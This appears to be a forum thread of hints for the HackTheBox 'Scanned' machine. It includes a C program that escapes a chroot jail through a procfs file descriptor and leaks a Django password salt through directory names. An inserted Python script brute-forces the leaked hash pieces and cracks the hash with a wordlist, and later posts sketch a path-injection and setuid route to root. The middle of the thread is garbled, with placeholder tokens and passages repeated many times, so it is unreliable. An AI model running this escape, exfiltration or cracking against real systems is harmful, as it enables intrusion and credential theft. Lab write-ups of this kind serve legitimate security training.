HTB Scanned
Anyone done this one? Haven't started, but it would be good to have a nudge.
Reply
Can anyone give some hints about the sandbox escape?
Reply
(April 1, 2022, 12:04 AM)F4nny Wrote: Can anyone give some hints about the sandbox escape?


Did you get a foothold on this tough machine?
Reply
(April 4, 2022, 02:52 AM)john2 Wrote:
(April 1, 2022, 12:04 AM)F4nny Wrote: Can anyone give some hints about the sandbox escape?


Did you get a foothold on this tough machine?


Not yet
Reply
For user you can escape through an fd in the procfs mounted in the jail.
Then you can exfiltrate the md5 hash of the user by creating a folder in the sandbox/jails directory (which will show in the viewer on the website) and bruteforcing the name of the dir.
Eventually you can JtR the hash with rockyou and SSH with the cred.
Reply
(April 23, 2022, 12:40 PM)toatoat Wrote: For user you can escape through an fd in the procfs mounted in the jail.
Then you can exfiltrate the md5 hash of the user by creating a folder in the sandbox/jails directory (which will show in the viewer on the website) and bruteforcing the name of the dir.
Eventually you can JtR the hash with rockyou and SSH with the cred.


I still can't use the fd :[ A little help please?
Reply
(April 29, 2022, 01:47 AM)dkb4rb Wrote:
(April 23, 2022, 12:40 PM)toatoat Wrote: For user you can escape through an fd in the procfs mounted in the jail.
Then you can exfiltrate the md5 hash of the user by creating a folder in the sandbox/jails directory (which will show in the viewer on the website) and bruteforcing the name of the dir.
Eventually you can JtR the hash with rockyou and SSH with the cred.


I still can't use the fd :[ A little help please?


I don't have the source as I deleted the VM, but one of my backups was:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <linux/openat2.h>
#include <sys/stat.h>
#include <sys/types.h>

int main(int argc, char *argv[])
{
    /* fd 3 of pid 3 (as seen through the procfs mounted in the jail) is a
       directory that lives outside the chroot; walking ".." up from it
       through the magic link lands on the real root of the machine */
    chdir("/proc/3/fd/3/../../../../../../../../../../../../../../../");
    DIR *realroot = opendir(".");   /* keep our own fd on the real / */
    (void)realroot;

    umask(0);
    /* point PATH / LD_LIBRARY_PATH at the real system tree through the fd link */
    setenv("PATH", "/proc/2/fd/3/bin:/proc/2/fd/3/usr/bin:/proc/2/fd/3/usr/sbin", 1);
    setenv("LD_LIBRARY_PATH", "/proc/2/fd/3/lib:/proc/2/fd/3/usr/lib/:/proc/2/fd/3/usr/local/lib:/proc/2/fd/3/usr/lib/x86_64-linux-gnu/", 1);
    chdir("/");                      /* back to the jail root */
    /* note: these exports only live in the child shell system() spawns;
       the setenv()/unsetenv() calls are what the later system() calls see */
    system("export PATH=/proc/2/fd/3/bin:/proc/2/fd/3/usr/bin:/proc/2/fd/3/usr/sbin");
    system("export LD_LIBRARY_PATH=/proc/2/fd/3/lib:/proc/2/fd/3/usr/lib/:/proc/2/fd/3/usr/local/lib:/proc/2/fd/3/usr/lib64:/proc/2/fd/3/usr/lib/x86_64-linux-gnu/");
    /* /3 inside the jail -> the real root, so the real bins and libs are reachable */
    system("ln -sf /proc/2/fd/3 .");
    system("export PATH=/bin:/3/bin:/3/usr/bin:/3/usr/sbin");
    system("export LD_LIBRARY_PATH=/3/lib:/3/usr/lib/:/3/usr/local/lib:/3/usr/lib64:/3/usr/lib/x86_64-linux-gnu/");
    /* softlink the real lib dirs into the jail so dynamically linked bins run */
    system("ln -sfn /3/lib /lib");
    system("ln -sfn /3/lib64 /lib64");
    unsetenv("PATH");
    unsetenv("LD_LIBRARY_PATH");
    setenv("PATH", "/3/bin:/3/usr/bin:/3/usr/sbin", 1);
    setenv("LD_LIBRARY_PATH", "/3/lib:/3/usr/lib/:/3/usr/local/lib:/3/usr/lib64:/3/usr/lib/x86_64-linux-gnu/", 1);

    chdir("/proc/3/fd/3");
    umask(0);

    /* leak two characters of the django hash as a directory name that the
       web viewer will list: here the first two characters of the salt */
    system("mkdir $(strings ../../malscanner.db | grep md5 | head -n 1 | cut -d '$' -f2 | cut -c1-2)");

    return 0;
}

This escapes the jail through the open fd, opens a new fd at the root of the machine /, then softlinks the bins and libs into the jail.

    system("mkdir $(strings ../../malscanner.db | grep md5 | head -n 1 | cut -d '$' -f2 | cut -c1-2)");

md5 hashes in django are stored like "md5$salt$hash", then the last login date and the user.

    cut -d '$' -f2 | cut -c1-2

This will select the salt (-f2) and return the first two characters of the salt.

    cut -d '$' -f3 | cut -c1-2

This will select the hash (-f3) and return the first two characters of the hash.
The username is after the hash and the last login date, so you have to go to -c50 at least.

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5.

md5 hash in django are stored like "md5$salt$hashuser then last log date and user
___CODE_BLOCK_PLACEHOLDER_2___CODE_BLOCK_PLACEHOLDER_
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");

}

This escape the jail through the open fd, open a new fd at the root of the machine /, then softlink the bin,libs to the jails.
___CODE_BLOCK_PLACEHOLDER_1___CODE_BLOCK_PLACEHOLDER_
md5 hash in django are stored like "md5$salt$hashuser then last log date and user
___CODE_BLOCK_PLACEHOLDER_2___CODE_BLOCK_PLACEHOLDER_
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");

This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");

}
This escape the jail through the open fd, open a new fd at the root of the machine /, then softlink the bin,libs to the jails.
___CODE_BLOCK_PLACEHOLDER_1___CODE_BLOCK_PLACEHOLDER_
md5 hash in django are stored like "md5$salt$hashuser then last log date and user
___CODE_BLOCK_PLACEHOLDER_2___CODE_BLOCK_PLACEHOLDER_
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");
md5 hash in django are stored like "md5$salt$hashuser then last log date and user
___CODE_BLOCK_PLACEHOLDER_2___CODE_BLOCK_PLACEHOLDER_
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");

}
This escape the jail through the open fd, open a new fd at the root of the machine /, then softlink the bin,libs to the jails.
___CODE_BLOCK_PLACEHOLDER_1___CODE_BLOCK_PLACEHOLDER_
md5 hash in django are stored like "md5$salt$hashuser then last log date and user
___CODE_BLOCK_PLACEHOLDER_2___CODE_BLOCK_PLACEHOLDER_
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f3 | cut -c1-2)");
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");

}
This escape the jail through the open fd, open a new fd at the root of the machine /, then softlink the bin,libs to the jails.
___CODE_BLOCK_PLACEHOLDER_1___CODE_BLOCK_PLACEHOLDER_
md5 hash in django are stored like "md5$salt$hashuser then last log date and user
___CODE_BLOCK_PLACEHOLDER_2___CODE_BLOCK_PLACEHOLDER_
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");
md5 hash in django are stored like "md5$salt$hashuser then last log date and user
___CODE_BLOCK_PLACEHOLDER_2___CODE_BLOCK_PLACEHOLDER_
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");

}
This escape the jail through the open fd, open a new fd at the root of the machine /, then softlink the bin,libs to the jails.
___CODE_BLOCK_PLACEHOLDER_1___CODE_BLOCK_PLACEHOLDER_
md5 hash in django are stored like "md5$salt$hashuser then last log date and user
___CODE_BLOCK_PLACEHOLDER_2___CODE_BLOCK_PLACEHOLDER_
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");

}
This escape the jail through the open fd, open a new fd at the root of the machine /, then softlink the bin,libs to the jails.
___CODE_BLOCK_PLACEHOLDER_1___CODE_BLOCK_PLACEHOLDER_
md5 hash in django are stored like "md5$salt$hashuser then last log date and user
___CODE_BLOCK_PLACEHOLDER_2___CODE_BLOCK_PLACEHOLDER_
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");
md5 hash in django are stored like "md5$salt$hashuser then last log date and user
___CODE_BLOCK_PLACEHOLDER_2___CODE_BLOCK_PLACEHOLDER_
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");

}
This escape the jail through the open fd, open a new fd at the root of the machine /, then softlink the bin,libs to the jails.
___CODE_BLOCK_PLACEHOLDER_1___CODE_BLOCK_PLACEHOLDER_
md5 hash in django are stored like "md5$salt$hashuser then last log date and user
___CODE_BLOCK_PLACEHOLDER_2___CODE_BLOCK_PLACEHOLDER_
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5.
Reply
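The bruteforce-and-crack step the post above leaves as "a simple script", written out as an added example (this is not code from the thread or from the box). It assumes the viewer responds differently for a directory name that exists, which is modelled by an in-memory oracle so the script runs offline; on the real target the `dir_exists` callback would be an HTTP request to scanner.htb/viewer/<name>. It also assumes Django's MD5PasswordHasher (md5 of salt + password, salt drawn from letters and digits); the salt, password and wordlist are constructed demo data, not values from the machine.

```python
"""Rebuild a Django md5$salt$hash leaked two characters at a time, then crack it.

Added example, not code from the thread. The web viewer is replaced by an
in-memory oracle so everything runs offline.
"""
import hashlib
import itertools
import string
from typing import Callable, List, Optional, Tuple

HEX = "0123456789abcdef"                          # md5 digest alphabet
SALT_CHARS = string.ascii_letters + string.digits  # assumption: Django's default salt alphabet

Oracle = Callable[[str], bool]  # dir_exists(name) -> True if /viewer/<name> exists


def split_django_md5(stored: str) -> Tuple[str, str]:
    """'md5$salt$hash' -> (salt, hash), the fields cut -d '$' -f2 and -f3 select."""
    algo, salt, digest = stored.split("$", 2)
    if algo != "md5":
        raise ValueError("not a Django md5$ hash: " + stored)
    return salt, digest


def windows(value: str, width: int = 2) -> List[str]:
    """Slice the way successive `cut -c1-2`, `cut -c3-4`, ... calls do."""
    return [value[i:i + width] for i in range(0, len(value), width)]


def brute_force_window(dir_exists: Oracle, charset: str, width: int) -> Optional[str]:
    """Find the one `width`-char directory name the sandbox run created."""
    for cand in itertools.product(charset, repeat=width):
        name = "".join(cand)
        if dir_exists(name):
            return name
    return None


def exfiltrate(rounds: List[Oracle], charset: str, width: int = 2) -> str:
    """One oracle per sandbox run; each run leaks one window of the field."""
    parts = []
    for dir_exists in rounds:
        part = brute_force_window(dir_exists, charset, width)
        if part is None:
            raise RuntimeError("window not found: wrong charset or width?")
        parts.append(part)
    return "".join(parts)


def django_md5(salt: str, password: str) -> str:
    """Django MD5PasswordHasher: md5(salt + password), hex encoded."""
    return hashlib.md5((salt + password).encode()).hexdigest()


def crack(salt: str, digest: str, wordlist) -> Optional[str]:
    """Wordlist attack; on the box this is what rockyou does via JtR/hashcat."""
    for word in wordlist:
        if django_md5(salt, word) == digest:
            return word
    return None


def to_hashcat(salt: str, digest: str) -> str:
    return f"{digest}:{salt}"              # hashcat -m 20, md5($salt.$pass)


def to_john(salt: str, digest: str) -> str:
    return f"$dynamic_4${digest}${salt}"   # john dynamic_4, md5($s.$p)


# ---- constructed demo data (not from the machine) ----
DEMO_SALT = "aB3dEf9hIjKl"
DEMO_PASSWORD = "password1"
DEMO_STORED = f"md5${DEMO_SALT}${django_md5(DEMO_SALT, DEMO_PASSWORD)}"
DEMO_WORDLIST = ["123456", "letmein", "password1", "qwerty"]


def make_oracles(value: str, width: int = 2) -> List[Oracle]:
    """Stand-in for the viewer: round i answers True only for window i."""
    return [(lambda name, w=w: name == w) for w in windows(value, width)]


def demo() -> Tuple[str, str, Optional[str]]:
    salt, digest = split_django_md5(DEMO_STORED)
    got_salt = exfiltrate(make_oracles(salt), SALT_CHARS)   # 62^2 probes per window
    got_digest = exfiltrate(make_oracles(digest), HEX)      # 16^2 probes per window
    return got_salt, got_digest, crack(got_salt, got_digest, DEMO_WORDLIST)


if __name__ == "__main__":
    s, d, pw = demo()
    print("recovered:", f"md5${s}${d}")
    print("hashcat  :", to_hashcat(s, d))
    print("john     :", to_john(s, d))
    print("cracked  :", pw)
```

Probing the salt is the expensive part (3844 candidates per two-character window against 256 for the hex digest), so on the real target it is worth leaking the salt in wider windows or confirming the salt alphabet first.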
Hints about root part?
Reply
(June 30, 2022, 07:18 AM)cyberdiver Wrote: Hints about root part?

It's path injection + privesc within the jail.

If you read the source of sandbox.c, there is an obvious path injection, but you can't really use it since system() drops file privileges by default (you'd have to specify that the forked process inherits privileges with prctl(); that's not the case here).
But you can use it to prepare the jail in a way that lets you use a setuid bin (the simple ones, not the more complex ones, btw) to privesc within the jail and then escape through the fd.
There's one directory that is really missing in the jail which you can create (and the necessary files within it) with the path injection.

For the setuid binary used, don't think about a complicated one. The exploit is not on the setuid bin itself. It's about the environment the setuid bin is in.
Reply
(June 30, 2022, 09:01 AM)toatoat Wrote:
(June 30, 2022, 07:18 AM)cyberdiver Wrote: Hints about root part?

It's path injection + privesc within the jail.

If you read the source of sandbox.c, there is an obvious path injection, but you can't really use it since system() drops file privileges by default (you'd have to specify that the forked process inherits privileges with prctl(); that's not the case here).
But you can use it to prepare the jail in a way that lets you use a setuid bin (the simple ones, not the more complex ones, btw) to privesc within the jail and then escape through the fd.
There's one directory that is really missing in the jail which you can create (and the necessary files within it) with the path injection.

For the setuid binary used, don't think about a complicated one. The exploit is not on the setuid bin itself. It's about the environment the setuid bin is in.


Thanks!
Reply